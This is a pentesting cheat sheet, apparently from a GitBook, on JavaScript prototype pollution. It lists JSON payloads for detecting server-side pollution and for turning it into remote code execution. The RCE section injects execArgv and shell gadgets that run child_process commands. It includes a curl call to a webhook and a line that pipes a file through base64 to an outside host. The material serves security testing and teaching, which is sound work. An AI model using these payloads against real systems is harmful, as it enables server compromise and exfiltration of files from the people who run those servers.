# Prototype Pollution

Prototype pollution is a JavaScript vulnerability that enables an attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects.\
`name.__proto__` ,  `name['__proto__']` ,  `name.constructor.prototype`

**Steps**:

* Try different ways of adding an arbitrary property to `Object.prototype`.\
  Try to inject an arbitrary property via the query string, URL fragment, and any JSON input.\
  (es. `__proto__[foo]=bar` -> In console `Object.prototype.foo`)
* Identify a gadget property that allows you to execute arbitrary JavaScript.

Use [DOM Invader](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/prototype-pollution) and [Server-Side Prototype Pollution Scanner](https://portswigger.net/bappstore/c1d4bd60626d4178a54d36ee802cf7e8).

## [Server Side](https://portswigger.net/web-security/prototype-pollution/server-side)

More difficult to detect:

* No source code access
* Lack of developer tools
* The DoS problem
* Pollution persistence

`POST` or `PUT` requests that submit JSON data to an application or API are prime candidates

{% code title="POST Request" overflow="wrap" %}

```json
{
    "user":"wiener",
    "__proto__":{
        "foo":"bar"
    }
}
```

{% endcode %}

{% code title="POST Request" overflow="wrap" %}

```json
{
    "user":"wiener",
    "constructor":{
        "prototype":{
            "foo":"bar"
        }
    }
}
```

{% endcode %}

<pre class="language-json" data-title="Response" data-overflow="wrap"><code class="lang-json"><strong>{
</strong>    "username":"wiener",
    "foo":"bar"
}
</code></pre>

### Detection

{% code overflow="wrap" %}

```json
"__proto__": {
    "json spaces": 10
}
// raw response.
```

{% endcode %}

{% code overflow="wrap" %}

```json
"__proto__": {
    "status": 412
}
// then trigger an error response with json body.
```

{% endcode %}

### RCE

For identifying

```json
"__proto__": {
    "shell":"node",
    "NODE_OPTIONS":"--inspect=webhook.com\"\".webhook\"\".com"
}
```

For exploit

{% code overflow="wrap" %}

```json
"__proto__":{
    "execArgv": [
        "--eval=require('child_process').execSync('curl webhook')"
    ]
}
// find functionality that may spawn node child processes.
```

{% endcode %}

or

{% code overflow="wrap" %}

```json
"__proto__":{
    "shell":"vim",
    "input":":! <command>\n"
    // ex. -> ! cat /file | base64 | curl -d @- https://webhook\n"
}
// find functionality that may spawn node child processes.
```

{% endcode %}